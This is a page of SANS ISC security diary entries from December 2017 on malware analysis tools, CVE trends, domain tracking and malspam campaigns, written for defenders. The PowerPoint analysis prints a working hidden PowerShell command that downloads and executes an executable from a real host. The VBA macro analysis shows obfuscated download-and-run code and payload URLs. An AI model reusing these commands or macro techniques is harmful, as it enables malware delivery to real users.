Diaries

Published: 2017-12-31

Analyzing TNEF files

Yesterday I came across a file type I rarely have to analyze: "Transport Neutral Encapsulation Format". It's an attachment file format used by Outlook and Exchange.

Here is how the file command identifies it:

There are different free and opensource programs and libraries that can parse this file format. There's a Python module tnefparse that comes with a parsing program:

So this TNEF file contains one attached file: an .iso file.
tnefparse can extract this .iso file:

I've covered the analysis of .iso files before in this diary entry.
 

With 7-zip, I can look into the .iso file:
 

And extract the .exe (MD5 d71e537c1ca1aba1f6854c0cb7b71835) file:
 

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

0 Comments

Published: 2017-12-30

2017, The Flood of CVEs

2017 is almost done and it’s my last diary for this year. I made a quick review of my CVE database (I’m using a local cve-search[1] instance). The first interesting number is the amount of CVE’s created this year. Do you remember when the format was CVE-YYYY-XXXX? The CVE ID format[2] changed in 2014 to break the limit of 9999 entries per year. This was indeed a requirement when you see the number of entries for the last five years:

2017 14680
2016 6447
2015 6480
2014 7946
2013 5191

If more and more organisations are taking security into consideration, how to explain this peak of reported vulnerabilities? First, I think that, in parallel to organisations focusing on security, “attackers” are also more and more active. Not only bad guys who are always looking into ways to make more profit but also students and security researchers. In Europe, offensive security trainings are very popular. People like to learn how to “break stuff”. Also, there was a huge increase in bug bounty programs[3] which motivate people to search for new vulnerabilities.

We also see new vendors that are not coming directly from the IT field but that make intensive use of these technologies. Some examples that received (at least) a CVE in 2017:

  • Tesla - CVE-2016-9337[4]
  • Bavarian-Motor-Works (BMW) - CVE-2017-9212[5]
  • Miele (home appliances) - CVE-2017-7240[6]
  • GMV (ATMs) - https://www.cvedetails.com/cve/CVE-2017-6968/[7]

Note: I did not even mention all products related to small IoT gadgets, industrial systems, etc.

Does this mean that the security of our products is worse? For many of them, I don’t think so. Most of those vulnerabilities have been fixed by vendors. This makes their products stronger. Let's think about this scenario: You're looking for a new "device" and you have the choice between two vendors. You have a look at the vulnerabilities associated with them. The first one has 10 CVEs and the second one only 2. Does it mean that the second one is better? Not necessarily, the first one might have a bug bounty program, can have a broader users bases (which means that more people are looking into its products). The most important is to check how they react when a vulnerability is reported to them. Do they fix quickly the vulnerability? Do they try to reduce the noise? To prosecute the researcher (sometimes)? Once the vulnerability has been fixed, the main problem remains the process of patching or updating the affected products! 

[1] http://cve-search.github.io/cve-search/
[2] https://cve.mitre.org/about/faqs.html#what_is_cve_id
[3] https://www.bugcrowd.com/bug-bounty-list/
[4] https://www.cvedetails.com/cve/CVE-2016-9337/
[5] https://www.cvedetails.com/cve/CVE-2017-9212/
[6] https://www.cvedetails.com/cve/CVE-2017-7240/
[7] https://www.cvedetails.com/cve/CVE-2017-6968/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

0 Comments

Published: 2017-12-27

What are your Security Challenges for 2018?

We are almost at the end of another year. Last year I wrote a diary on Talent Shortage [1] and from what I have seen, it is still difficult to find the right people with the right skills [2]. I read more than ever, enterprises have to start coming up with creative recruitment strategies to hire the next generation of security professionals (IP-based skillsets) and develop strong training programs to bring them up-to-speed with the right security skills needed to defend or audit their enterprise. Obviously, you can learn a lot of things in a classroom but some skills can only be acquired in the real world. Anyone willing to learn or is curious about how attacks methods works and how to defend against them, has strong ethics and problem solving skills sound like a candidate you might want to coach and hire.

Technologies are rapidly evolving and changing; keeping on top of all of them is difficult and not really possible. I think it is becoming important to specialize whether it is offensive (pen testing and audit) or defending networks. Don't get me wrong, I believe it is important to have a strong understand of both but I think at some point picking a side (auditing or defending) is the right thing to do.

Last but not least, cybercrimes are going to continue to grow and be more focus against selected products (corporate "secret sauce"), user data, groups and employees. Malicious actors are always looking for new methods to gain access, steal data and sell it to whoever is willing to pay for it.

What are your predictions for the coming year?

[1] https://isc.sans.edu/forums/diary/Is+there+an+Infosec+Cybersecurity+Talent+Shortage/21541/
[2] https://www.bricata.com/blog/cyber-security-talent-shortage/

-----------
Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

2 Comments

Published: 2017-12-25

Dealing with obfuscated RTF files

I see a lot of malicious RTF files that are heavily obfuscated. Last, I received a sample that rtfobj or rtfdump could not handle properly to correctly identify OLE objects ("Not a well-formed OLE object"). But my rtfdump tool has an option that can help decode objects that are not well-formed. Let's take a closer look.

rtfdump does not identify OLE objects in this sample, however, the h= indicator tells us that there are a lot of hexadecimal characters.

Let's take a closer look at the first sequence with hexadecimal strings (sequence 4 is the first, inner most nested sequence with 6989 hexadecimal characters and an hexadecimal string of 252 characters):

It looks like an embedded object, however the control word is \.\objdata while we expect \*\objdata. And it contains an obfuscated hexadecimal string that indicates the presence of an OLE file: d0cf11e0a1b11ae1.

So let's convert this hexadecimal data to binary with option -H:

First we see the string "Equation.3", so this could be an exploit for %%cve:2017-11882%% (the equation editor vulnerability).

Next we see that rtfdump.py was not able to deobfuscate the hexadecimal string correctly: da 0c f1 1e 0a 1b 11 ae 10. There is one extra nibble (a), which shifts all subsequent bytes by 4 bits.

Using option -S, we can try to fix this, by shifting the byte sequence by 4 extra bits, making the total shift by 8 bits, e.g. one byte:

This time, when we scroll down, we find indeed the exploit command:

This decoded sequence can be dumped (option -d) to extract strings:

Conclusion: when rtfdump is not able to correctly deobfuscate hexadecimal strings, try option -S.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

1 Comments

Published: 2017-12-24

PDF documents & URLs: update

I've written before about PDFs with URLs used in social engineering attacks (TL;DR: nowadays, it's more likely you'll receive a malicious PDF that just contains a malicious URL, than a PDF with malicious code).

Since then, I've had a couple of questions about such PDFs where the URL is stored indirectly. Let me give you an example.

I'm using pdfid.py to do a first check of the pdf (I'm using option -n to suppress counters that are equal to 0):

You can see that name /URI appears twice: this is a strong indication that the PDF contains a URL.

Let's extract the values for name /URI with pdf-parser.py:

Instead of extracting the URL, we see that value "18 0 R" was extracted. 18 0 R is a reference to an object with id 18 and version 0.

pdf-parser's option -o can be used to look at this object:

By default, pdf-parser displays the dictionary of an object, but not the data. To view this data, use option -w:

Now we can see that object 18 is just a string: the URL we wanted to extract.

 

 

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

0 Comments

Published: 2017-12-23

Encrypted PDFs

I received a bug report for my pdf-parser: it could not decompress the streams of a PDF document (FlateDecode decompress failed).

The real reason of the error, is that the PDF document is encrypted, something that is easy to check with pdfid:

Encypted PDFs retain their structure, what is encrypted is the content of streams and strings.

pdf-parser.py can analyze encrypted PDFs, but it can not look into the content of streams and strings: the PDF must be decrypted first, for example with a tool like QPDF.

PDFs can be encrypted for 2 reasons: for DRM and for confidentiality. PDFs encrypted for DRM can be decrypted without password, while PDFs encrypted for confidentiality require a password (QPDF handles both types).

Sometimes, malware authors will encrypt their malicious PDFs to try to evade detection. If you don't know the password of the malicious PDF you want to analyze, you can try to crack the password.

 

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

2 Comments

Published: 2017-12-21

I'm All Up in Your Blockchain, Pilfering Your Wallets

With the latest “gold rush” in cryptocurrency, many people are investing (or speculating, depending on your perspective) in Bitcoin and various other currencies. Many of these people are not the same tech-savvy people who have been mining for years, they are chasing big rates of returns. While the economic risks are its own discussion, this post will talk about some observations in how to protect the security of your cryptocurrency.

For the most part, an individual’s cryptocurrency is controlled by their wallet (or wallets) which are the recipient and holder of the “coins”. Much like your physical wallet, if that wallet gets taken, most bets are off in terms of your data being taken. Unlike your physical wallet, there is no external way to know your cryptocurrency wallet has been taken. It’s a file, and files can be duplicated and copied.

This happens organically a wide variety of ways, even security tools will copy and sandbox files it may see on the endpoint. If the wallet is not encrypted and the sandbox allows for open downloads, that allows for situations where entrepreneurial researchers to search for wallet files and use them to appropriate your assets. For example, see the wallet below, which had about $18M USD worth of bitcoin, that was seen freely available for download (no I didn’t take their bitcoins).

Someone with too many bitcoins

The key against this is to encrypt the wallet, but for a wallet this size, to keep most of the assets in a “cold wallet” stored offline (i.e. USB key in a safe), and to minimize any security tools or Microsoft Windows from sending telemetry of the machine. As a note, many wallets are encrypted with laughably weak passwords… strong passwords are a must here. Here are some more tips from Bitcoin.org in protecting your wallet.

Many less tech-savvy users rely on various web-wallets, where a vendor controls the actual wallet file. If you are working with a reputable vendor, you are probably ok, but exchanges can and do get hacked (Mt. Gox for one), such as this recent story about YouBit from S. Korea filing for bankruptcy after having lost 4,000 bitcoin. There isn’t much a consumer can do about these kinds of threats because the market is unregulated. If there is a large pool of assets, storing that across multiple vendors can give some degree of risk mitigation.

While people are looking at the upside (well not at this moment, as BTC is down), there are risks that are unique and in an unregulated market, it all falls on the user to protect themselves.

--
John Bambenek
bambenek \at\ gmail /dot/ com
Fidelis Cybersecurity

0 Comments

Published: 2017-12-19

Example of 'MouseOver' Link in a Powerpoint File

I really like Microsoft Office documents... They offer so many features that can be (ab)used to make them virtual bombs. Yesterday, I found a simple one but nicely prepared Powerpoint presentation: Payment_copy.ppsx (SHA256:7d6f3eb45c03a8c2fca4685e9f2d4e05c5fc564c3c81926a5305b6fa6808ac3f). It was still unknown on VT yesterday but it reached now a score of 1/61![1]. It was delivered to one of my catch-all mailboxes and contained just one slide. 

The file extension is .ppsx which means that, once opened, it will automatically start in slideshow mode (full screen) and present the following slide to the victim:

Instead, if you don’t double-click on the file and open it with Powerpoint, you will see that the page has one hyperlink. Thanks to Microsoft, a "hyperlink" does not only refer to an URL but can also refer an executable or a script. Even more, you can activate it via two techniques: “Mouse Click” or “Mouse Over”:

The application is, of course, a Powershell interpreter with some malicious code passed as the argument. If you extract XML data from the PowerPoint file, you’ll find:

<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships”>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target='powershell%2520-W%2520Hidden%2520-command%2520%28new-object%2520System.Net.WebClient%29.DownloadFile%28%27http%253A%2527+%255Bchar%255D47+%2527%2527+%255Bchar%255D47+%2527ddl3.data.hu%2527+%255Bchar%255D47+%2527get%2527+%255Bchar%255D47+%2527216544%2527+%255Bchar%255D47+%252710920665%2527+%255Bchar%255D47+%2527Payment.exe%27%2C%24env%3ATemp+%27%5CDRXEBY.exe%27%29%3B%28New-Object%2520-com%2520Shell.Application%29.ShellExecute%28%24env%3ATemp+%27%5CDRXEBY.exe%27%29' TargetMode="External”/>
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml”/>
</Relationships>

Here is a beautified version of the Powershell command with all its arguments:

powershell -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http'+[char]47+''+[char]47+'ddl3.data.hu'+[char]47+'get'+[char]47+'216544'+[char]47+'10920665'+[char]47+'Payment.exe',$env:Temp+'\DRXEBY.exe');(New-Object -com Shell.Application).ShellExecute($env%:Temp+'\DRXEBY.exe')

The payload 'Payment.exe' is still unknown on VT when writing this diary (SHA256:a655f0b97c1d84df09b96ea5c4de986207ef5f7369b6c8f7a897aaa7be06a028). Depending on your Windows environment and Office security settings, you could get a pop-up warning because spawning the malicious Powershell but, in some cases, a simple mouse movement over the link will execute it.

[1] https://www.virustotal.com/#/file/7d6f3eb45c03a8c2fca4685e9f2d4e05c5fc564c3c81926a5305b6fa6808ac3f/detection

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

3 Comments

Published: 2017-12-18

Phish or scam? - Part 2

We continue the MSG analysis of yesterday.

There are several ways to take a look at the text contained in a Word .docx file without using MS Office.

Here we will look at the raw XML. The content of a Word file is stored in the following file:

As you can see, the text of the document is contained between XML tags. Filtering out these XML tags, for example with a regular expression and SED, reveals the text without any formatting:

But it can be harder to understand without any new lines. And sometimes, this method will strip away info you want to see.
That is why I wrote a simple tool in Python that reads XML and can extract various information: xmldump.py.
You can achieve the same result as with sed by using command xmldump.py text:

Command wordtext is like command text, but it looks for paragraphs (<w:p>) and inserts a newline after extracting the text of each paragraph:

 

From the content of the Word document, it's clear that this is a scam.
Just for the sake of trying to be thorough, I poked around a bit looking for exploits or feature abuse (like DDE), but found nothing.
 

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

0 Comments

Published: 2017-12-17

Phish or scam? - Part 1

Reader Carlos Almeida submitted an email with a .docx attachment.

As MSG files are Compound File Binary Format files, we can use oledump to start analyzing this email.

The hexadecimal codes in the stream names are an indication of the purpose and type of the stream data. I developed a new oledump plugin to identify streams in MSG files:

A condensed overview can be obtained using option -q (quiet):

The first column after the hexadecimal data tells us what the data type is: BINary, UNIcode or ASCii.

And the last column informs us about the purpose of the data stream.

Let's take a look at some, like:

- the subject:

Since the data type is UNICODE, we use oledump's option -t to decode the content as UTF16.

- the headers:

- the message body:

The attachment looks to be a .docx file:

We can analyze this attachment with zipdump:

This looks indeed like a Word document without macros.

With re-search, we can search through the XML files for URLS, email addresses, BTC addresses and IPv4 addresses.

We don't find any suspicious URLs:

Just a suspicious email address:

Now it would be useful to read the content of the Word document, without actually having to open it in Word. That's what we'll do in the next part of this diary entry.

Stay tuned.

 

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

3 Comments

Published: 2017-12-16

Microsoft Office VBA Macro Obfuscation via Metadata

Often, malicious macros make use of the same functions to infect the victim's computer. If a macro contains these strings, it can be flagged as malicious or, at least, considered as suspicious. Some examples of suspicious functions are:

  • Microsoft.XMLHTTP (used to fetch web data)
  • WScript.Shell (used to execute other scripts or commands)

Yesterday, I found a cool Microsoft Office document which uses its metadata to obfuscate the malicious macro. Also known as document properties, metadata are details about a file that describe or identify it. We can find details such as title, author name, subject, and keywords. The document was properly formatted with a nice welcome page and asked the users to enable macros:

But, when you look at the metadata, you see immediately that something is suspicious. Let’s use Viper to extract the details:

+---------------------+---------------------------------------------------------------------------------------------------------------------+
| Name                | Value                                                                                                               |
+---------------------+---------------------------------------------------------------------------------------------------------------------+
| codepage_doc        | 1251                                                                                                                |
| category            | None                                                                                                                |
| presentation_target | None                                                                                                                |
| bytes               | 148480                                                                                                              |
| lines               | 2                                                                                                                   |
| paragraphs          | 1                                                                                                                   |
| slides              | None                                                                                                                |
| notes               | None                                                                                                                |
| hidden_slides       | None                                                                                                                |
| mm_clips            | None                                                                                                                |
| scale_crop          | False                                                                                                               |
| heading_pairs       | None                                                                                                                |
| titles_of_parts     | None                                                                                                                |
| manager             | None                                                                                                                |
| company             |                                                                                                                     |
| links_dirty         | False                                                                                                               |
| chars_with_spaces   | 282                                                                                                                 |
| unused              | None                                                                                                                |
| shared_doc          | False                                                                                                               |
| link_base           | None                                                                                                                |
| hlinks              | None                                                                                                                |
| hlinks_changed      | False                                                                                                               |
| version             | 1048576                                                                                                             |
| dig_sig             | None                                                                                                                |
| content_type        | None                                                                                                                |
| content_status      | Microsoft.XMLHTTPHCTAMAdodb.streaMHCTAMshell.ApplicationHCTAMWscript.shellHCTAMProcessHCTAMGeTHCTAMTeMPH <redacted> |
| language            | None                                                                                                                |
| doc_version         | None                                                                                                                |
+---------------------+---------------------------------------------------------------------------------------------------------------------+

The ‘content_status’ contains a long string that is used in the macro. In the VBA code, there is a reference to BuiltInDocumentProperties(), used to extract metadata. Here is the corresponding function (code has been beautified):

Public Function statRom1() As String
   // Read the content of ‘content_status'
   tt = ThisDocument.BuiltInDocumentProperties("Content status").Value
   // Split the script by removing ‘HCTAM'
   SubMenu = Split(tt, "HCTAM”)
   // Here is the array of suspicious strings:
   //  0: Microsoft.XMLHTTP
   //  1: Adodb.streaM,
   //  2: shell.Application
   //  3: Wscript.shell
   //  4: Process
   //  5: GeT
   //  6: TeMP
   //  7: Type
   //  8: open
   //  9: write
   // 10: responseBody
   // 11: savetofile,
   // 12: \bososo.exe
   VertikName = SubMenu(3 * Quubo)
   // Quubo == 0 -> VertikName == ‘Microsoft.XMLHTTP’ and call Vertik
   Vertik
   SuD = ""
End Function

Here is the Vertik() function. All SubMenu(x) can be replaced based on the array created above (SubMeny(2) => ‘shell.Application’, SubMenu(3) => ‘Wscript.shell’ , etc)

Public Sub Vertik()
  Set CofeeShop = CreateObject(VertikName) // CreateObject(Microsoft.XMLHTTP)
  smbi = RDM.Label1.Caption
  SubMenuE = SubMenu(2)
  Set Puppit_avatar = CreateObject(SubMenu(3))
  AnimTransferMap "Caption", False
  Set Puppit_VEAM = Puppit_avatar.Environment(SubMenu(4))
  Stocke = 24 / 4
  Puppit_FLAME = Puppit_VEAM(SubMenu(6))
  MakeFarplane "G", "I", "MS"
End Sub

Later, the same technique is used to extract the URL where is stored the payload to download:

Shtefin = Replace("neosophyVUDIorg/nyRhdkwSDRUDNatakanVUDIcRIMBL/nyRhdkwSD", "RIMBL", "om”)
// Returns: neosophyVUDIorg/nyRhdkwSDRUDNatakanVUDIcom/nyRhdkwSD
Shtefin = Replace(Shtefin, "VUDI", ".”)
// Returns: neosophy.org/nyRhdkwSDRUDNatakan.com/nyRhdkwSD
AttMiner = Split(Join(Array(Shtefin, ""), ""), RDM.VLCPKD.Caption)

‘RDM.VLCPKD.Caption’ contains ‘RUDN’ and the array with two malicious URL’s is created:

  • hXXp://neosophy[.]org/nyRhdkwSD
  • hXXp://atakan[.]com/nyRhdkwSD

‘RDM’ is the name of the document, set in the beginning of the macro:

Attribute VB_Name = “RDM"

And the document contains a form with an object called ‘VLCPKD’:

As you see, the form also contains other pieces of function names ('Writ' + 'eToFile') or interesting strings ('http://').

Finally, the document had a classic behaviour: A PE file is downloaded and executed.

The Office document hash is cafe939110ed204dfcfd312e21aade2148dcf17ce1d5a6226e1c30c4edcaf4af[1]
The PE file hash is d27ea2a862848c82b7726584c6e66e41cb4988e3e92a42391d85d24fbe4e3d9c[2]

[1] https://www.virustotal.com/#/file/cafe939110ed204dfcfd312e21aade2148dcf17ce1d5a6226e1c30c4edcaf4af/detection
[2] https://www.virustotal.com/#/file/d27ea2a862848c82b7726584c6e66e41cb4988e3e92a42391d85d24fbe4e3d9c/details

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

0 Comments

Published: 2017-12-14

Detection Lab: Visibility & Introspection for Defenders

     Me when I discovered @Centurion's Detection Lab.

So Much Win

Chris Long, Detection & Incident Response Analyst at Palantir, released Detection Lab this past Monday. From his own Medium post, "Detection Lab is a collection of Packer and Vagrant scripts that allow you to quickly bring a Windows Active Directory online, complete with a collection of endpoint security tooling and logging best practices."
Detection Lab consists of four hosts:

  • DC: A Windows 2016 domain controller
  • WEF: A Windows 2016 server that manages Windows Event Collection
  • Win10: A Windows 10 host simulating a non-server endpoint
  • Logger: An Ubuntu 16.04 host that runs Splunk and a Fleet server

From the Detection Lab GitHub, "this lab has been designed with defenders in mind. Its primary purpose is to allow the user to quickly build a Windows domain that comes pre-loaded with security tooling and some best practices when it comes to system logging configurations. It can easily be modified to fit most needs or expanded to include additional hosts."

The feature list should close the deal for you:

  • Splunk forwarders are pre-installed and all indexes are pre-created. Technology add-ons for Windows are also preconfigured.
  • A custom Windows auditing configuration is set via GPO to include command line process auditing and additional OS-level logging
  • Palantir's Windows Event Forwarding subscriptions and custom channels are implemented
  • Powershell transcript logging is enabled. All logs are saved to \\wef\pslogs
  • osquery comes installed on each host and is pre-configured to connect to a Fleet server via TLS. Fleet is preconfigured with the configuration from Palantir's osquery Configuration
  • Sysmon is installed and configured using SwiftOnSecurity’s open-sourced configuration
  • All autostart items are logged to Windows Event Logs via AutorunsToWinEventLog
  • SMBv1 Auditing is enabled

Chris really wanted defenders to "have a quick and easy way to bring up a lab environment, complete with tooling and pre-configured logging." Detection Lab represents many of his weekends worth of work, over many months, and for that, we salute him. Well done, Chris!

Russ McRee | @holisticinfosec

2 Comments

Published: 2017-12-14

Security Planner: Improve your online safety

Just in time for holiday visits with your familes and friends, soon you will face the inevitable questions, particularly if you're a security practitioner of any sort. "There are always questions about whether the devices and services we use respect our privacy, and if they adequately safeguard our information. Has a good balance been struck? Many of us are not sure. It is easy to feel overwhelmed by the challenge of how to be safer online." Search for "how to be safe online" and you'll receive inconsistent results to be certain. Who hasn't had Mom or Dad, or your friends for that matter, ask your help to be more secure? To help rectify such situations, the Citizen Lab just released Security Planner.

All you need do is answer a few simple questions to receive personalized online safety recommendations. The app requires no personal information or access to any of your online accounts, it's confidential and can immediately help improve your online safety, with advice from experts. This is definitely something you can sit your parents down in front of knowing that, if they apply the recommendations provided after answering some very straightforward questions, they'll benefit from an improved online security posture.

"Security Planner recommendations are research-based best practices, kept up-to-date by a community of experts in digital security. Quality is maintained through a careful peer-review process: a committee of recognized experts regularly reviews and updates the survey questions and recommendations based on the latest research."

You can read the detailed philosophy behind Security Planner here.

For you, your friends, your family, the road to improved privacy, security, and safety online starts here: https://securityplanner.org

Russ McRee | @holisticinfosec

0 Comments

Published: 2017-12-13

Tracking Newly Registered Domains

Here is the next step in my series of diaries related to domain names. After tracking suspicious domains with a dashboard[1] and proactively searching for malicious domains[2], let’s focus on newly registered domains. They are a huge number of domain registrations performed every day (on average a few thousand per day all TLD’s combined). Why focus on new domains? With the multiple DGA (“Domain Generation Algorithms”) used by malware families, it is useful to track newly created domains and correlate them with your local resolvers’ logs. You could detect some emerging threats or suspicious activities.

The challenge is to find a list of all those domains. They’re plenty of online services that provide this kind of data. Some of them allow to browse the new domains online[3], others sell this kind of database, usually linked with the corresponding whois data via a monthly fee (usually around $65)[4]. Some registrars offer a list for their own TLD’s (like the AFNIC in France[5]) but they are limited.

I was looking for a global list that includes all TLD’s and, if possible, for free. I found whoisds.com[6] which offers this service. They provide a complete database (domains + whois data) for a monthly fee but the “simple” list is available for free (only domains) and without any registration.

I’m fetching the file via a simple shell script and a cron job:

#!/bin/bash
TODAY=`date --date="-2 day" +"%Y-%m-%d”`
DESTDIR=“/home/domains"
URL="https://whoisds.com/whois-database/newly-registered-domains/$TODAY.zip/nrd"
USERAGENT="XmeBot/1.0 (https://blog.rootshell.be/bot/)"
TEMPFILE=`mktemp /tmp/wget_XXXXXX.zip`
LOGFILE=`mktemp /tmp/wget_XXXXXX.log`
CSVFILE="/opt/splunk/etc/apps/search/lookups/newdomains.csv"

# Check if the destination directory exists
[ -d “$DESTDIR" ] || mkdir -p “$DESTDIR"
# Ensure that the file does not exist already
[ -r “$DESTDIR/$TODAY.txt" ] && rm "$DESTDIR/$TODAY.txt"

wget -o $LOGFILE -O $TEMPFILE --user-agent="$USERAGENT" $URL
RC=$?
if [ "$RC" != "0" ]; then
        echo "[ERROR] Cannot fetch $URL"
        cat $LOGFILE
else
        unzip -d $DESTDIR $TEMPFILE >$LOGFILE 2>&1
        RC=$?
        if [ "$RC" != "0" ]; then
                echo "[ERROR] Cannot unzip $TEMPFILE"
                cat $LOGFILE
        else
                echo "newdomain" >$CSVFILE
                cat “$DESTDIR/$TODAY.txt" >>$CSVFILE
                rm $LOGFILE $TEMPFILE
        fi
fi

This script is executed once a day to store the daily file in the specified directory. A CVS file is also created in the specific Splunk application. Note that the script fetches the file being 2 days old (--date="-2 day") because I detected that sometimes, the previous day is published with some delay!

With the CVS file created in Splunk, I can now search for newly created domains in my Bro DNS logs:

index=securityonion sourcetype=bro_dns rcode="A" OR rcode="AAAA"
|rex field=qclass ".*\.(?<newdomain>\w+\.\w+)"
|search [|inputlookup newdomains.csv]

You can also search for specific keywords like brands, keywords related to your business:

# cat domains_keyword.csv
keyword
*bank*
*paypal*
*apple*
*ec2*

Here is an interesting Splunk query:

|inputlookup newdomains.csv
|rex field=newdomain "(?<keyword>\w+)\.\w+"
|search [|inputlookup domains_keyword.csv]

This search returned for yesterday:

halk-bankbireysel.com
storybankmaine.org
summitbank.org 
towercommunitybankmortgage.org

Happy hunting! 

[1] https://isc.sans.edu/forums/diary/Suspicious+Domains+Tracking+Dashboard/23046/
[2] https://isc.sans.edu/forums/diary/Proactive+Malicious+Domain+Search/23065/
[3] https://domainpunch.com/tlds/daily.php
[4] https://www.whoisxmlapi.com/newly-registered-domains.php
[5] https://www.afnic.fr/en/products-and-services/services/daily-list-of-registered-domain-names/#
[6] https://whoisds.com/newly-registered-domains

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

4 Comments

Published: 2017-12-12

December Microsoft Patch Tuesday Summary

Microsoft today patched 36 different vulnerabilities (+ Flash). Luckily, none of the vulnerabilities have been exploited in the wild of have been disclosed prior to today. The list includes the malware protection engine update that was released on Friday. Probably the most interesting vulnerability is the remote code execution in Windows RRAS. (%%cve:2017-11885%%). According to Microsoft, this vulnerability can be exploited via RPC on servers that have routing enabled. (RRAS is the Routing and Remote Access Service). I am a bit confused why Microsoft rates this one only as "important". Maybe because RRAS is not enabled by default.

CVE Description
Disclosed Exploited Exploitability (old versions) current version Severity
%%cve:2017-11885%% Windows RRAS Service Remote Code Execution Vulnerability
No No Less Likely Less Likely Important
%%cve:2017-11889%% Scripting Engine Memory Corruption Vulnerability
No No - - Critical
%%cve:2017-11890%% Scripting Engine Memory Corruption Vulnerability
No No More Likely More Likely Critical
%%cve:2017-11893%% Scripting Engine Memory Corruption Vulnerability
No No - - Critical
%%cve:2017-11895%% Scripting Engine Memory Corruption Vulnerability
No No More Likely More Likely Critical
%%cve:2017-11899%% Microsoft Windows Security Feature Bypass Vulnerability
No No Less Likely Less Likely Important
%%cve:2017-11901%% Scripting Engine Memory Corruption Vulnerability
No No More Likely More Likely Critical
%%cve:2017-11903%% Scripting Engine Memory Corruption Vulnerability
No No More Likely More Likely Critical
%%cve:2017-11906%% Scripting Engine Information Disclosure Vulnerability
No No More Likely More Likely Important
%%cve:2017-11908%% Scripting Engine Memory Corruption Vulnerability
No No - - Critical
%%cve:2017-11909%% Scripting Engine Memory Corruption Vulnerability
No No - - Critical
%%cve:2017-11910%% Scripting Engine Memory Corruption Vulnerability
No No - - Critical
%%cve:2017-11911%% Scripting Engine Memory Corruption Vulnerability
No No - - Critical
%%cve:2017-11912%% Scripting Engine Memory Corruption Vulnerability
No No More Likely More Likely Critical
%%cve:2017-11913%% Scripting Engine Memory Corruption Vulnerability
No No More Likely More Likely Important
%%cve:2017-11914%% Scripting Engine Memory Corruption Vulnerability
No No - - Critical
%%cve:2017-11918%% Scripting Engine Memory Corruption Vulnerability
No No - - Critical
%%cve:2017-11927%% Microsoft Windows Information Disclosure Vulnerability
No No Less Likely Less Likely Important
%%cve:2017-11930%% Scripting Engine Memory Corruption Vulnerability
No No More Likely More Likely Critical
%%cve:2017-11932%% Microsoft Exchange Spoofing Vulnerability
No No Less Likely Less Likely Important
%%cve:2017-11937%% Microsoft Malware Protection Engine Remote Code Execution Vulnerability
No No Less Likely Less Likely Critical
ADV170021 Microsoft Office Defense in Depth Update
No No More Likely More Likely None
ADV170023 Microsoft Exchange Defense in Depth Update
No No - - None
%%cve:2017-11886%% Scripting Engine Memory Corruption Vulnerability
No No More Likely More Likely Critical
%%cve:2017-11887%% Scripting Engine Information Disclosure Vulnerability
No No More Likely More Likely Important
%%cve:2017-11888%% Microsoft Edge Memory Corruption Vulnerability
No No - - Critical
%%cve:2017-11894%% Scripting Engine Memory Corruption Vulnerability
No No More Likely More Likely Critical
%%cve:2017-11907%% Scripting Engine Memory Corruption Vulnerability
No No More Likely More Likely Critical
%%cve:2017-11905%% Scripting Engine Memory Corruption Vulnerability
No No - - Critical
%%cve:2017-11916%% Scripting Engine Memory Corruption Vulnerability
No No - - Important
%%cve:2017-11919%% Scripting Engine Information Disclosure Vulnerability
No No More Likely More Likely Important
%%cve:2017-11934%% Microsoft PowerPoint Information Disclosure Vulnerability
No No Less Likely Less Likely Important
%%cve:2017-11935%% Microsoft Excel Remote Code Execution Vulnerability
No No - - Important
%%cve:2017-11936%% Microsoft SharePoint Elevation of Privilege Vulnerability
No No - - Important
ADV170022 December 2017 Flash Security Update
No No - - Critical
%%cve:2017-11939%% Microsoft Office Information Disclosure Vulnerability
No No - - Important
%%cve:2017-11940%% Microsoft Malware Protection Engine Remote Code Execution Vulnerability
No No Less Likely Less Likely Critical

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
STI|Twitter|

 
 

0 Comments

Published: 2017-12-11

Pornographic malspam pushes coin miner malware

Introduction

On Saturday 2017-12-09 and Sunday 2017-12-10, I came across a wave of malicious spam (malspam) with links to a Bitcoin miner disguised as pornographic material.  The emails all had the same links.  One of them was off-line by the time I checked, but the other downloaded a zip archive named SeeMyXXXphoto.zip.  Windows Defender quickly caught and deleted the malware, so people aren't really at risk for this.  However, I wanted to document this campaign with a quick diary.

Details

The emails had various subject lines, spoofed senders, and different first paragraphs in the message text.  I submitted an example in the .eml format to VirusTotal (link). The emails each contained a different pornographic image followed by the message text.  The second paragraph in each message text read the same, stating:

Maybe you want see my private XXX photo??? Ooooohhhh.... ok! Just download archive from this link and open and install it. And you can get access to some my hot photos )))

It was followed by a link to: hxxp://martialartsbenefits[.]com/SeeMyXXXphoto.zip


Shown above:  Screenshot from one of the emails (minus the pornographic image).


Shown above:  Downloaded zip archive and the extracted file.

Windows Defender identified the malware as Trojan:Win32/Tiggre!rfn, but that didn't describe the malware for me.  A quick check on VirusTotal indicates the malware is a Bitcoin miner.  Running the malware on a Windows host in my lab environment confirmed Bitcoin miner-style traffic, and it appears to be based on CPUminer Multi version 1.1.


Shown above:  Windows Defender quickly caught the file when I tried downloading it on 2017-12-10.


Shown above:  VirusTotal indicates the downloaded file is a coin miner.


Shown above:  Traffic from an infection filtered in Wireshark indicates this is CPUminer Multi version 1.1.

Indicators

Emails noted:

  • Date/Time:  Sunday, 2017-12-10 00:08 UTC
  • From:  "Isabelle" <uahaddeq@2winglobal.com>
  • Subject:  That's why I love our parties! Just look here
